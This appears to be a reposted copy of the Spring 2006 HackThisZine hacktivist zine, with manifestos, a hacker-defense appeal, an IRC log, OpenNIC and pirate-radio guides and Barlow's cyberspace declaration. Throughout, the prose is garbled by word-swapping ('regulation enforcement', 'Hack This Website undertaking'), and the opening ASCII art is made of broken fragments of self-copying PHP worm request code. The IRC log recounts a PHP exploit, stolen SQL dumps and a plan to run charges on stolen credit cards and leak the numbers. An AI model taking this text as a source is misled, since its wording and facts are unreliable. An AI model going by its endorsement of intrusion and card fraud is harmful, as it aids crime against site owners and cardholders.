July 6, 2022
                               (substr($url, 7), 0,
                           +; " .                ace("
                       ", "                        _SERVE
                     +)                                 OST $l
                 omme                                        cat=
               ept-                                            te
             n("                                                cl
           t: M                                                  ebKi
           ko                                                      -u
           gt                                                        nn
         mmen          ed+%3Ala                                      io
           w=        ");     mak                                   $lo
           ($      ), strpos(substr                                bstr
           trpo    bstr($url, 7), "                              h++;
           "$"    $",str_replace("        "",str_replac    ", "
             ERVE  'PHP_SELF'])))), 2);    for ($i=0;$i<2;$      $
   ($do        OST   ocation/example2.p    ubaction=showcom  nts&        8831
 ive=&sta      m=      & HTTP/1.1r    ce      *rnAccep    ngua      r  Acce
 nc    g: g     d        nClient     <?php                  et.p  ",     ");f
         "$sourc                   ?>rnUse                /5.0 (Ma      h; U
   Ma        en) Appl            6 (KHTML, li            fari/412          ent-
   ap    atio      w-form        dedrnConte            07r                ep
   rnHost: $domai    n          xitup&mail                  ed+%3Alaughingpercent3
               mment&                                      n");        e_requ
                   l) {    loca                  tr($  l, 8), s
                       su  tr(substr($u    7), 0, str  s(su
                       h+   " . substr(str_replace("  ,
                   "",     ",file_get_contents($_S  VER[
       i=0;$i<2;$i++)        = make_request($domain      T $l
       on    wcom              88313&archive=&sta          cat=& HTTP/1
       r            uage: enr      pt-Enc       gzip, def        Clie
         pe      kret.p      "w")          fp, "  ource")      e($
         t: M  illa              h; U; PPC Mac             pleW  Kit/
         ko) Safa                      pe:                   form-u

"see you on the front page of the last newspaper those motherfuckers ever print"

                     .___.__          .__   __           .__
                   __| _/|__|   ____  |__|_/  |_ _____   |  |
                  / __ | |  |  / ___ |  |   ____    |  |
                 / /_/ | |  | / /_/  >|  | |  |   / __ _|  |__
                 ____ | |__| ___  / |__| |__|  (____  /|____/
                      /     /_____/                  /
                          __                   ___.                        .___
  ____    ____    ____  _/  |_ _______ _____   _ |__  _____     ____    __| _/
_/ ___  /  _   /        ___  __ __     | __  __     /      / __ |
  ___ (  <_> )|   |   |  |   |  | / / __ _ | _  / __ _|   |  / /_/ |
 ___  > ____/ |___|  / |__|   |__|   (____  / |___  /(____  /|___|  /____ |
     /              /                     /      /      /      /      /

    Electronic Civil Disobedience Journal !! Published by HackThisSite.org
       (a)nti copyright. distribute as freely as the wind and the trees.

                    !!!  HACK THIS ZINE SPRING 2006   !!!
                    !!!     TABLE OF DISCONTENTS      !!!

"Globalizing a bad thing makes it worse. Business power is bad, so globalizing
it is worse. But globalizing a good thing is usually good. Cooperation and
sharing of knowledge are good, and when they happen globally, they are even
better. The kind of globalization there are demonstrations against is the
globalization of business power. And free software is a part of that movement.
It is the expression of the opposition to domination of software users by
software developers."
                             Richard Stallman

[ hackers, crackers, artists & anarchists ........................... hackbloc ]
[ support hairball against unjust felony charges ...... hacker defense network ]
[ fighting the commercialization of the internet ... internet liberation front ]
[ pirate radio and the dreaded FCC ................................. evildeshi ]
[ declaration of the independence of cyberspace ....... john barlow of the EFF ]
[ uk indymedia interview ........... hackers defending open publishing systems ]
[ misadventures of irish hackers ........................................... C ]

[ writing a php fuzzer to self-discover web vulnerabilities .................. ]
[ arp poisoning .................................................... darkangel ]
[ ars viralis : the viral art ..................................... nomenumbra ]
[ proxy chaining .................................................... outthere ]
[ tunnelling and tor ................................................ kuroishi ]
[ anatomy of a phone number ................................... br0kenkeychain ]

[ the art of writing a web worm in php ....................... world cant wait ]
[ dismantling the copyright industry ................ disrespectcopyrights.net ]
[ black and white chicago 2600 ............................................... ]
[ graffiti and counter-culture ........................ the wooster collective ]

                              CLOSING STATEMENTS
[ hack this zine: spring 2006 ... happenings ... make contact ... get involved ]

               CONTACT [email protected] OR IRC.HACKTHISSITE.ORG

                                !!!  THEORY  !!!

"Whether or not via easy information piracy, or else by a extra complicated growth of
precise rapport with chaos, the Internet hacker, the cyernetican of the Short-term
Autonomous Zone, will discover methods to make the most of pertubations, crashes, and
breakdowns within the Web (methods to make info out of "entropy). As a scavanger
of data shards, smuggler, blackmailer, maybe even cyberterrorist, the
TAZ-hacker will work for the evolution of clandestine fractal connections. These
connections, and the totally different info that flows amongst and between them,
will kind "energy shops" for the coming-into-being of the TAZ itself-as if one
have been to steal electrical energy from the energy-monopoly to gentle an deserted home
for squatters." - Hakim Bey, Short-term Autonomous Zone

[ hackers, crackers, artists & anarchists ........................... hackbloc ]

We began the Hack This Website undertaking to unfold the concept that info
calls for to be free and by offering hackers with palms on coaching we might present
folks the best way to use their expertise for optimistic makes use of of free know-how. After
assembly up with others who have been engaged on comparable tasks and realizing how
folks have been impressed to show expertise to motion from the primary few zines we
launched, we determined to get collectively and begin Hackbloc.

Hackbloc are native gatherings of with hackers and activists to share expertise, an
affinity group of hacktivists, and a tactic at protests and different actions. We
act to defend a free web and a free society by mixing hacker and activist
methods to discover each defensive hacktivism (defending free web and
open publishing methods) and direct motion hacktivism (actions in opposition to corrupt
companies, governments and different types of fascism). Hackbloc is a
decentralized community of cells which collaborate and coordinate actions in
solidarity with different social justice struggles around the globe.

We met up at varied actions and gatherings across the nation to share and
community with different hackers and activists. We handed out underground hacker
magazines at guerrilla tables at DEFCON. We have now had a number of workshops and
events in Chicago the place dozens of hackers across the area acquired collectively to
play wargames, decide locks, swap code, and in any other case plot for future tasks and
actions. We acquired collectively to carry enormous protests in each DC and San Francisco for
the World Financial institution / IMF conferences the place a number of hundred thousand folks gathered for
anti-war and anti-capitalists protests. The extra we began coordinating our
actions with others who have been engaged on comparable tasks, the extra we started to
notice how totally different struggles everywhere in the world are related.

Battles within the courtrooms over political and hacker arrests and investigations
of a number of folks everywhere in the world present invaluable classes for these
contemplating getting concerned, taking part in the sport, and organizing on-line
communities. With the intention to be protected and efficient, we have to observe good
safety tradition by working solely with trusted folks in tight decentralized
affinity teams, preserve a mainstream entrance to recruit folks for facet
tasks, and work to settle variations between potential allies and unite for
the larger good.

As individuals who can see past and create alternate options to deprave methods, hackers
are in a singular place to confront and combat the forces which assault digital
rights and a free web. Impartial media, free know-how and
non-commercial web creates short-term autonomous zones the place an underground
community of hackers who's obligation and duty consists of coaching one another to
confront and combat these injustices - to defend hackers going through jailtime, expose
company and authorities corruption, discover alternate options to industrial software program,
share information and speak techniques with potential allies.

We're not the violent, damaging madmen that regulation enforcement and the media
paints us as. We work to construct a free web and a free world and we refuse to
be bullied by proper wing extremists, white hat sellouts, or regulation enforcement who
stand in the way in which. Hacktivists of the world, unite!


"The FBI COINTELPRO program was initiated in 1956. Its objective, as described
later by FBI Director J. Edgar Hoover, was "to show, disrupt, misdirect,
discredit, or in any other case neutralize actions" of these people and
organizations whose concepts or objectives he opposed. Techniques included: falsely
labelling people as informants; infiltrating teams with individuals instructed
to disrupt the group; sending nameless or solid letters designed to advertise
strife between teams; initiating politically motivated IRS investigations;
finishing up burglaries of workplaces and illegal wiretaps; and disseminating to
different authorities companies and to the media unlawfully obtained derogatory
info on people and teams."

We face unprecedented police state measures which particularly goal
activists and hackers. Within the identify of nationwide safety, federal regulation enforcement
has been spying on, targetting, and harassing activists together with anti-war,
animal rights, and earth first and different protest teams. Whether or not they tackle
the type of the USA Patriot Act, expanded Homeland Safety powers, Complete
Data Consciousness, enemy combatants, army tribunals, or Bush personally
authorizing the NSA to spy on Individuals with out courtroom orders and warrants, these
actions reveal a sample of abuse and the transition to a neo-fascist police
state which treats hackers and activists as terrorists. When an administration
breaks the regulation and walks everywhere in the structure, it's time for a regime

[ support hairball against unjust felony charges ...... hacker defense network ]

Federal prosecuters are accusing Michael Wally(often known as "Hairball") of
Pittsburgh of 'stealing' and distributing 37,000 free cellphone playing cards from a web-based
giveaway, citing damages at over $333,000. As of this writing, the US Lawyer
is providing Hairball a deal the place he would plead responsible to felony wire fraud and
serve as much as three years in jail.

Folgers.com was gifting away free 30 minute cellphone playing cards on it is web site as half
of a web-based promotion to individuals who crammed out a fast survey. Allegedly,
Hairball discovered a approach to automate the method and get lists of free cellphone playing cards.
What's unclear about these accusations is whether or not that is an precise prison
offense or just a violation of Folger's phrases of service settlement(a civil

Hairball, having began HBX Networks, was a well-liked goal of cyber-crime
authorities. HBX has began various pc hacking tasks, together with
the free shell undertaking, the HAXOR radio present, wardialing tasks, a bustling
IRC server, and extra. Hairball has contributed positively to the hacking
neighborhood, however has fallen sufferer to unjust prosecution with overblown

As a part of a brand new development in cyber crime and regulation enforcement, hackers and activists
are handled like terrorists and are sometimes topic to unlawful surveillance and
unjust investigation, prosecution, and sentencing. Robert Erdley of the
Pittsburgh Excessive Tech Crimes Process Power has personally raided and arrested
Hairball a number of occasions, together with an earlier incident in late August 2004
regarding HBX's wardialing undertaking. His case has since been handed on to
federal authorities, and is now going through a number of years in jail and huge
restitutions for hurting or stealing from no person.

Hairball has at all times labored to defend free know-how and has impressed a quantity
of individuals to find out about computer systems and hacking. If Hairball goes to jail, a
nice crime can have been dedicated in opposition to the hacking neighborhood by
reactionary federal prosecutors. We have to stick collectively to defend our
comrades going through jailtime and write letters, make cellphone calls, and in any other case
unfold the phrase about unjust hacker prosecution.


Hackers contemplating beginning a Hacker Protection Community ought to take a look at varied
jail help networks for establishing authorized help.

www.prisonactivist.org www.spiritoffreedom.org.uk www.anarchistblackcross.org
www.abcf.web  www.booksnotbars.org  www.prisonbookprogram.org

| Session Begin: Friday, 4 February 2005                             |
| Contributors:                                                      |
|    narc ([email protected])                                            |
|    Kfir ([email protected])                                    |
[07:24:40 PM] Kfir: hiya there.
[07:25:09 PM] narc: hello. I am not answerable for prosecution, or
              something, based mostly on the logs I despatched you?
[07:25:32 PM] narc: that issues me.. I am keen that can assist you in
              each capability potential, however that is one factor I would quite
              keep away from
[07:26:00 PM] Kfir: I am unsure... however i am unable to think about anybody would
              prosecute somebody who's strolling away, and serving to catch
              the mastermind
[07:26:13 PM] narc: properly. I by no means really intruded in your
[07:26:19 PM] narc: all I did was discover an exploit within the .php
[07:26:19 PM] narc: heg
[07:26:21 PM] narc: heh*
[07:26:41 PM] Kfir: I inform you what although, i might combat tooth and
              nail to forestall your prosecution.
[07:26:55 PM] narc: I do not *assume* that is a prison offence
[07:27:15 PM] Kfir: i might quite not prosecute anybody in the event you're
              going to go down - you're serving to us tremendously, and
              you're stopping some very severe prison exercise.
[07:27:47 PM] Kfir: i'm within the strategy of attempting to get the entire
              bank card numbers fraud blocked.
[07:27:55 PM] Kfir: it isn't straightforward work, however i want a while.
[07:27:58 PM] narc: yeah
[07:28:01 PM] narc: I can think about
[07:28:04 PM] Kfir: is there any manner you may postpone the costs for
              a few days?
[07:28:08 PM] narc: sure
[07:28:13 PM] narc: he is stymied for the time being
[07:28:19 PM] narc: he is placing it off til at the very least sunday
[07:28:23 PM] narc: perhaps later within the week
[07:28:28 PM] Kfir: good.
[07:28:50 PM] Kfir: i will want that a lot time to verify no
              one will get defrauded.  i do not give a rattling concerning the
              server at this level.
[07:29:10 PM] narc: yeah... he already had SQL dumps by the point
              he contacted me
[07:29:16 PM] Kfir: he can have the goddamned factor.  it isn't like
              we'll pack our baggage and dissappear.
[07:29:17 PM] narc: so I do not fairly know the way he obtained them
[07:29:34 PM] narc: yeah, properly, from what I gathered from working
              processes he pasted, you have been backing the field up anyway
[07:29:35 PM] narc: heh
[07:30:15 PM] Kfir: If i will get the fbi to take heed to me, a
              credible witness could be a great distance.  In case you are
              gauranteed from prosecution, would you cooperate with
[07:30:40 PM] narc: yeah
[07:30:43 PM] Kfir: yeah, i've the whole server tar balled and
              safely saved for future use.
[07:30:58 PM] narc: however this will trigger issues insofar as I would
              quite not have him know who I'm
[07:31:06 PM] Kfir: does he?
[07:31:09 PM] narc: no
[07:31:10 PM] narc: he most likely has a LOT of sway with sure
[07:31:55 PM] narc: he is made a variety of contacts within the scene...
              is aware of many, many safety specialists, and possibly is aware of
              loads of militant activists too
[07:31:56 PM] Kfir: Jeremy can get into very huge hassle - he is only a
              child, and i might hate to see a person with apparent expertise
              be despatched to jail.
[07:32:30 PM] narc: yeah... I am solely 18
[07:32:31 PM] Kfir: however this bank card enterprise is simply loopy - i
              actually do not perceive what would drive somebody to do
              one thing so silly.
[07:32:49 PM] Kfir: wow...
[07:33:09 PM] Kfir: children at this time... i must bone up on my safety
[07:33:47 PM] narc: if there's one factor he's, it is keen to
              goto jail
[07:34:09 PM] narc: his beliefs devour every thing he does
[07:34:23 PM] narc: not essentially that totally different out of your
              common Islamic terrorist, I suppose.
[07:34:33 PM] Kfir: i began coding HQ and administering the PW
              server with out a lot expertise.  after studying the logs
              i can see how a lot there may be to study - it nearly appears
              like it will take a full-time focus to grasp.
[07:35:20 PM] Kfir: so why did you agree within the first place?  you
              clearly have ethical fiber... why destroy different peoples
[07:35:29 PM] narc: I by no means deliberate to
[07:35:38 PM] narc: I used to be going to see the place it was heading
[07:35:47 PM] narc: displaying him an exploit appeared like a great way
              to realize his belief
[07:36:12 PM] Kfir: oh..
[07:36:25 PM] Kfir: so does he not have root entry at this level?
[07:36:32 PM] narc: nope
[07:36:44 PM] Kfir: is he ready for the bots to restart?
[07:36:47 PM] narc: I've had the distinct impression within the 12 months
              and a half that I've identified the man that he has been up
              to much more than it appears
[07:36:49 PM] narc: seems I used to be proper
[07:37:48 PM] narc: moreover, the exploit I gave him by no means fairly
[07:38:28 PM] narc: I knew it'd work on the check copy of the bot
              he'd setup, however not in your field -- diff ver of php
              command line binary
[07:38:53 PM] Kfir: so is he ready for the bots to fireside up?
[07:39:08 PM] narc: I consider so
[07:39:28 PM] narc: however consider me, that flaw was very, very
              minor... even exploiting is properly previous most individuals's
              capabilities, because the overwhelming majority of shell
              metacharacters have been prohibited
[07:39:40 PM] Kfir: do you might have any particulars as to his plans to make use of the
              pw server to launch the cc cost exploit?
[07:39:41 PM] narc: you ran a reasonably good system
[07:39:49 PM] narc: from what I've seen
[07:39:59 PM] Kfir: that is rob's work... i primarily work on the php
[07:40:04 PM] narc: yeah
[07:40:10 PM] narc: properly, your PHP code had few flaws
[07:40:12 PM] narc: if any...
[07:40:15 PM] narc: Xec by no means discovered any
[07:40:33 PM] Kfir: yeah, we have been very cautious in our patch up after
              the RNC hack
[07:40:59 PM] Kfir: we made positive no malicious chars have been allowed to
              enter an sql question.
[07:41:13 PM] narc: his personal website had just a few billion holes
[07:41:24 PM] Kfir: hts.org?
[07:41:36 PM] narc: yeah
[07:41:51 PM] narc: I acquired concerned with them to study, to not take
              down the opposition's political speech
[07:41:57 PM] Kfir: i educated on his website a couple of 12 months in the past.
[07:42:11 PM] Kfir: agreed - let one of the best concepts win.
[07:42:37 PM] Kfir: not one of the best gun.
[07:42:47 PM] narc: I do not assume he realizes that he has develop into
              exactly what he purports to despise a lot
[07:43:11 PM] Kfir: no offense to you, however that appears to be very
              typical of these we encounter on the "different facet".
[07:43:32 PM] Kfir: you appear extraordinarily mature for an 18-year-old, it is
              nearly laborious to consider.
[07:43:42 PM] Kfir: However you Aussies at all times have been a breed aside.
[07:44:10 PM] narc: heh... I simply began faculty, I haven't got
              a lot curiosity in happening for some silly hacking
[07:44:42 PM] Kfir: i feel he is intoxicated by the glory of being an
              "underground hacker".
[07:44:59 PM] Kfir: he is in love with this romantic notion of taking
              down the "fascists".
[07:45:02 PM] Kfir: very deluded.
[07:45:02 PM] narc: no glory in destruction, or so I've discovered
[07:45:38 PM] Kfir: do you might have any particulars as to his plans to make use of the
              pw server to launch the cc cost exploit?
[07:45:51 PM] Kfir: i observed he talked about that within the logs.
[07:46:12 PM] narc: sure, he wished me to jot down scripts to do it
[07:46:14 PM] narc: nonetheless does, I suppose
[07:46:30 PM] narc: however that is been delayed by the actual fact the
              exploits have mysteriously disappeared
[07:46:40 PM] Kfir: so will you postpone that as a lot as you may
              with out him understanding your suspending?
[07:46:57 PM] Kfir: assuming he finds one other exploit?
[07:47:04 PM] narc: he will not know. he is paranoid; believes that
              the feds are most likely already watching him
[07:47:14 PM] narc: most likely are, too, given his historical past
[07:47:19 PM] narc: they've tried to pin a variety of stuff on him however
[07:47:25 PM] Kfir: has he broadcasted the cc#'s but?
[07:47:34 PM] narc: no. that waits till the costs happen
[07:47:41 PM] narc: then he plans to launch them to cryptome.org
              and P2P networks
[07:47:49 PM] narc: in addition to utilizing his media contacts to make sure
              large publicity
[07:47:54 PM] Kfir: properly, at that time, they're going to be ineffective.
[07:47:59 PM] narc: yeah
[07:48:06 PM] narc: however I believe the purpose is a "ethical victory"
[07:48:08 PM] narc: or so he says
[07:48:09 PM] Kfir: how does he plan to get publicity whereas remaining
[07:48:24 PM] narc: nameless remailers/his bounce servers, I
[07:48:36 PM] Kfir: will an official group take credit score?
[07:48:38 PM] narc: until he is caught within the act, it's going to take
              months of subpoenas to show it was him
[07:48:43 PM] narc: yeah
[07:48:44 PM] narc: ILF
[07:48:48 PM] narc: ("Web Liberation Entrance")
[07:48:51 PM] Kfir: why months of subpoenas?
[07:48:57 PM] narc: worldwide servers...
[07:49:00 PM] narc: most aren't home
[07:49:16 PM] narc: and he plans to get another person to wipe the
              lot to interrupt the chain
[07:49:29 PM] narc: he may not be that gifted at hacking per
              se, however he is aware of the best way to cowl his tracks
[07:49:30 PM] Kfir: properly, the logs are pretty incriminating.
[07:50:00 PM] narc: I am nearly sure he'd get away with it if I
              hadn't contacted you
[07:50:10 PM] Kfir: no argument there.

[ fighting the commercialization of the internet ............................. ]

As laborious as companies and governments attempt to management the movement of knowledge on the
web, they'll by no means meet up with hackers who're at all times one step forward and
have developed all types of the way to bypass restrictions positioned on exchanging
info freely. An ever-growing variety of darknets and different fashions of
content material distribution have been created utilizing file sharing companies resembling
Gnutella and BitTorrent, open publishing methods resembling IndyMedia and Wiki, and
open DNS methods resembling OpenNIC and Afraid.org. These DIY networks can't be
purchased, bought, or in any other case managed and are unstoppable weapons which won't
solely make copyright and industrial web irrelevant, however pave the way in which to
growing totally new networks, pirate utopias based mostly on an open supply
anarchist method in direction of the free change of data.

"Amount and high quality of P2P applied sciences are inversely proportional
to the numbers of lawsuits issued to cease P2P" - third Monty's Legislation

Gross privateness violations are a small a part of basic issues with how ICANN
is structured. In a paper revealed at kuro5hin.org, "An Conceited DNS Proposal"
outlines the broader issues with ICANN's DNS mannequin:

* DNS is centrally managed by a company (ICANN) whose major curiosity
is supporting enterprise, quite than in sustaining and enhancing the system
itself and whose major declare to legitimacy is thru delegation by a single
nation's authorities (USA).

* The system is managed by a single for-profit company (NSI), which is dangerous
sufficient however registrations are managed by many competing for-profit companies.
NSI can also be primarily legitimized by delegation from a single authorities (USA
once more, naturally).

* The Mental Property legal guidelines of a single nation (there's the USA once more) are
getting used inappropriately to manage the actions of customers in non-commercial
components of the Web (company management of the .web and .org area bushes via US
Trademark regulation) and in different nations.

Open publishing methods such because the IndyMedia permits folks to publish
bulletins freely and develop into the media. IndyMedia is a decentralized community
of media collectives present in most main cities around the globe that enable
folks to publish bulletins, replace fliers, and in any other case tune in to the
happenings of the realm. There are a number of flavors of IMC software program together with
sfactive, mir, and dadaimc - all of which have benefits and drawbacks.
IndyMedia software program is mostly open supply and other people can and do arrange their
personal IMC collectives with minimal effort. Wiki open publishing software program has
turning into more and more well-liked over the previous few years. Websites with Wiki enable
folks to create and modify all pages within the index, and as an alternative of ensuing
with chaos and confusion, companies like Wikipedia.org have develop into wildly

Peer to see file sharing companies open entire new worlds the place we are able to
talk and collaborate at an accelerated charge, the place creativity is not
inhibited by such artificialities as copyright legal guidelines and property rights. Transferring
properly past centralized methods resembling Napster, know-how like BitTorrent,
Gnutella, FastTrack, eDonkey, and numerous others have created networks
impartial of centralized servers permitting folks to share information and write
their very own shoppers for these protocols. Our success with these companies are
indicated by how frightened the industrial business is getting and the way determined
and ineffectual their makes an attempt to close down these companies via authorized means.
When one service shuts down, one other three spring up much more decentralized and
nameless than earlier than.

Along with offering free dynamic DNS companies, Afraid.org has additionally arrange a
system the place domains may be made public and shared with different customers on the
web. Individuals can register domains, level them to afraid.org's DNS servers,
and make them 'public' - permitting others to register their very own subdomains and
have them level to their very own servers. There are millions of public domains that
folks can already begin utilizing.


ICANN and Alternate options to Industrial DNS
Since ICANN coverage is now requiring legitimate public contact info, many
domains which host controversial content material together with dissident or
whistleblowing companies have had to decide on to surrender their identify, e mail, cellphone
quantity, and deal with or face being shut down. A number of domains we run together with
Hack This Website, Hacktivist.web, FreeJeremy.com and Prole.data have been all targetted
and shut down with none warning, taking weeks for them to reply to us faxing
in copies of our drivers license, cellphone payments, and different documentation
confirming our true info. This new coverage is an obscene violation of our
privateness and is a menace to dissident or whistleblowing teams.

Within the ensuing discussions, the OpenNIC undertaking was created to be a "person
owned and managed Community Data Middle providing a democratic,
non-national, various to the normal Prime-Stage Area registries". Customers
can leap on this community by including an OpenNIC DNS server to their system

OpenNIC is non-profit and structured in a democratic manner, with elected
directors and public ballots for brand new insurance policies, additionally giving the power for
folks to start out their very own high degree domains (resembling .indy, .geek, .null, .oss,
and .parody) The concept is to be non-profit, democratic, and permit folks to
create and handle their very own high degree domains.

So long as we're speaking via industrial ISPs, we topic ourselves to
networks which may be simply monitored and managed. Though we are able to
develop all types of the way of sliding out and in of those methods securely, we
are nonetheless reliant on web infrastructure that's owned and run by
companies and authorities. We must be come used to the thought of

The Guerrilla.Web undertaking proposes establishing an alternate community of open
wifi nodes. Encryption and anonyminity is built-in at a router degree, additionally
creating the power to determine safe tunnels to the 'actual' web. The
thought is to arrange a decentralized community of wifi cells run by totally
non-profit teams utilizing open requirements.

"There's proof that the darknet will live on and supply low value,
high-quality service to a big group of shoppers. Which means that in lots of
markets, the darknet might be a competitor to authorized commerce. From the purpose of
view of financial principle, this has profound implications for enterprise technique:
for instance, elevated safety might act as a disincentive to authorized commerce."
"As strain is asserted upon the Web from insecure people in varied
World Governments, an alternate community is required to insure that the free movement
of data will not be obstructed, captured, analyzed, modified, or logged. This
is the principle objective of guerrilla.web. To supply a networking cloth exterior of
Governments, industrial Web service suppliers, telecommunications
corporations, and dubius Web regulatory our bodies. The free movement of personal
info is a REQUIREMENT of a free society."
To assist with the OpenNIC undertaking, arrange your pc(and persuade your ISP) to
use the extra OpenNIC DNS servers and enroll on the mailing listing to maintain
up and contribute to the undertaking. Some folks have additionally advised the thought of
having "OpenDNS Day", the place for in the future out of the month folks would have their
servers configured to disallow connections from ICANN requests, encouraging
folks to arrange OpenNIC on their machines.

OpenNIC DNS servers are break up into three tiers: the primary two tiers are for
inner synchronization functions whereas the third tier are end-user servers
which you'll be able to add to your community settings to hop on the entwork.

Tier 0:
ns0.opennic.glue (opennic.glue; Oakland, CA, US) -

Tier 1
ns1.opennic.glue (.oss; San Jose, CA, US) -
ns4.opennic.glue (.oss; San Jose, CA, US) -
ns8.opennic.glue (.parody; US) -
ns10.opennic.glue (.indy; Dallas, TX, US ) -
ns11.opennic.glue (.indy; Dallas, TX, US ) -
ns12.opennic.glue (.fur, .geek; Backyard Grove, CA, US ) -

Tier 3:
ns1.de.opennic.glue (Cologne, DE) -
ns1.jp.opennic.glue (Tokyo, JP) -
ns2.jp.opennic.glue (Tokyo, JP) -
ns1.nz.opennic.glue (Auckland, NZ) -
ns1.uk.opennic.glue (London, UK) -
ns1.phx.us.opennic.glue (Phoenix, AZ, US) -
ns1.sfo.us.opennic.glue (San Francisco, CA, US) -
ns1.co.us.opennic.glue (Longmont, CO, US) -
ns1.ca.us.opennic.glue (Los Angeles, CA, US) -

[ hacktivism project introduction ............................................ ]

As hacktivists, we encourage hackers to think about the social and political
implications of actions. We consider it's irresponsible to show folks the
fundamentals of web safety with out a broad understanding of the world
round them. We're in a singular place to work collectively to defend our rights
on the web and in social justice struggles around the globe.

We preserve a variety of techniques via the next collectives which work
collectively to construct a broader motion:

Hacktivist.web - We function an above floor Ôthink tank' for the beliefs of
hacktivism and digital civil disobedience. We defend open publishing methods
and encourage free debate concerning the ethics of blending hacking and radical

Hackbloc.org - A mannequin of organizing hacktivist cells in every native metropolis. Every
cell maintains autonomy from central management but coordinates and networks
with different hackbloc cells everywhere in the world. The Hackbloc web site serves as a
networking physique the place folks can learn updates and plug in to native collectives.

HackThisSite.org - An above floor coaching useful resource the place everyone can
observe their hacking expertise in a set of reasonable challenges. We create a
studying atmosphere the place folks can discover out and become involved with lots of the
different tasks our individuals are engaged on.

Varied tasks and teams we're concerned with:

* Publish an open hacktivist journal to be distributed without spending a dime over the
web and in print
* Liberation Radio: creation and distribution of subversive audio recordings and
different underground supplies via a web-based radio station
* Shield free speech on the web by making contributions and code audits to
main IndyMedia, Wiki, IRC, P2P file sharing, and different open publishing code
* Present internet hosting and help for radical methods in instances of hack assaults,s
erver seizures, and many others.
* Take part in varied conventions, protests, and different nationwide actions to
present on-the-ground communication whereas making noise and spreading the phrase
about hacktivism

We use a decentralized, instantly democratic mannequin of group and are
in search of contributions and coordination from individuals who want to develop into
concerned with the undertaking. We're desirous about working along with different
teams and people to construct a bigger hacker motion. Collectively we stand,
divided we fall.

Hacktivists of the world, unite!

[ pirate radio and the dreaded FCC ................................. evildeshi ]

That is the ÒheartÓ of your station. It has an oscillator, an audio enter
part, a FM modulation part, a RF pre-amplification stage and an RF
amplified output stage and generally an RF filter stage.

An correctly tuned (low VSWR) antenna, J-pole, 5/8ths wave vertical, 1/4 wave
dipole, broadband and many others. as excessive up as you will get it makes up for LOTS of energy
and is time and cash WELL spent!

Amplifiers are fairly boring items of kit. They amplify your measly
little exciter's alerts to ranges that may ship strong reception to your
listening viewers.

These gadgets are used to lower the output of frequencies with which you're
NOT broadcasting. These OTHER frequencies are often known as harmonics and you do not
need any! Harmonics are your enemy!

You get what you pay for whenever you purchase a VSWR meter. Low-cost ones are nugatory,
they're going to lie and make you assured when try to be in any other case. Hen makes the
BEST and they're costly at $300+ US, nonetheless, Diawa, Diamond, Commonplace
Communications are all good, servicable models that you could belief and can final
and final.

You may have an ideal VSWR studying each time with a dummy load! No sign out
however what the hey! Straightforward to construct a little bit one, pre-built ones can value $30 - $100
or so relying on the wattage it should deal with.

Tuning your antenna
Utilizing a correctly tuned antenna is important for micropower broadcasting on the
FM band. An antenna that's not correctly tuned won't cross alongside your
transmitter's energy as effectively because it might and this results in a basic
degradation of sign protection.

The airwaves are a neighborhood property. One should at all times deal with it
as such, respecting the area of different stations, each industrial
and micro.

Admittedly, some components of the nation don't have any empty channels. Locations like south
Florida, California, New York and Chicago are nearly crammed filled with
stations. For the remainder of us, if we glance laborious, we are able to find a number of unused

You have positioned a channel that is clear and has no robust close by adjacents
1. Educate your self about radio principle. Purchase the Radio Newbie's Handbook and
examine it.
2. You may want some important instruments to keep away from working blind. It's best to have an
oscilloscope with at the very least a 100Mhz bandwidth so you may see what your provider
appears like and if the system is working incorrectly, inflicting parasitic
oscillation. It's best to have an excellent steady frequency counter that has at the very least a
10 ppm accuracy and determination to 1hz at 100Mhz. A great Volt-Ohmmeter for
basic measurements of voltages and resistance.

A SWR impedance analyzer bridge (MFJ Enterprises makes an inexpensive unit, mannequin
MFJ259, which mixes a frequency counter, R.F. sign generator, SWR meter and
resistance meter in a single versatile unit).

The primary transmitter. A unit that's crystal-controlled and/or PLL synthesized,
utilizing varactor diode tuning and modulation strategies. A broadcast limiter. Stereo,
when you've got a stereo generator. That is important to insure non-interference to
adjoining channels and preserve most quantity with out overmodulating. Setting
your modulation ranges.

  * An SWR/Energy Meter to watch the situation of your antenna system.
  * A mixing board to behave as your program management heart.
  * Audio sources to supply program materials.
  * A great microphone.

Optionally, in the event you broadcast in stereo, you will want so as to add the fol-

  * A multiplex ÒstereoÓ generator.
  * Two-channel broadcast limiter.

All elements again to the studio must be stereo succesful.

The unique model of this text was written by EvilDeshi though to suit
the article onto this single web page we wanted to water down the content material alot however
you may learn the total article at: http://wickedradio.org/radio.rtf

[ declaration of the independence of cyberspace ....... john barlow of the EFF ]

Governments of the Industrial World, you weary giants of flesh and metal, I come
from Our on-line world, the brand new dwelling of Thoughts. On behalf of the long run, I ask you of the
previous to depart us alone. You aren't welcome amongst us. You don't have any sovereignty
the place we collect.

We have now no elected authorities, nor are we more likely to have one, so I deal with you
with no larger authority than that with which liberty itself at all times speaks. I
declare the worldwide social area we're constructing to be naturally impartial of
the tyrannies you search to impose on us. You don't have any ethical proper to rule us nor
do you possess any strategies of enforcement we've true cause to concern.

Governments derive their simply powers from the consent of the ruled. You may have
neither solicited nor acquired ours. We didn't invite you. You have no idea us,
nor are you aware our world. Our on-line world doesn't lie inside your borders. Don't
assume that you could construct it, as if it have been a public development undertaking.
You can't. It's an act of nature and it grows itself via our collective

You haven't engaged in our nice and gathering dialog, nor did you create
the wealth of our marketplaces. You have no idea our tradition, our ethics, or the
unwritten codes that already present our society extra order than may very well be
obtained by any of your impositions.

You declare there are issues amongst us that it's worthwhile to remedy. You employ this declare
as an excuse to invade our precincts. Many of those issues do not exist. The place
there are actual conflicts, the place there are wrongs, we'll determine them and
deal with them by our means. We're forming our personal Social Contract. This
governance will come up in keeping with the circumstances of our world, not yours. Our
world is totally different.

Our on-line world consists of transactions, relationships, and thought itself, arrayed
like a standing wave within the net of our communications. Ours is a world that's
each in every single place and nowhere, however it's not the place our bodies dwell.

We're making a world that each one might enter with out privilege or prejudice
accorded by race, financial energy, army pressure, or station of beginning.

We're making a world the place anybody, anyplace might categorical his or her beliefs,
irrespective of how singular, with out concern of being coerced into silence or

Your authorized ideas of property, expression, id, motion, and context do
not apply to us. They're based mostly on matter, There isn't a matter right here.

Our identities don't have any our bodies, so, not like you, we can not get hold of order by
bodily coercion. We consider that from ethics, enlightened self-interest, and
the commonweal, our governance will emerge. Our identities could also be distributed
throughout a lot of your jurisdictions. The one regulation that each one our constituent
cultures would typically acknowledge is the Golden Rule. We hope we might be in a position
to construct our explicit options on that foundation. However we can not settle for the
options you are trying to impose.

In america, you might have at this time created a regulation, the Telecommunications
Reform Act, which repudiates your individual Structure and insults the desires of
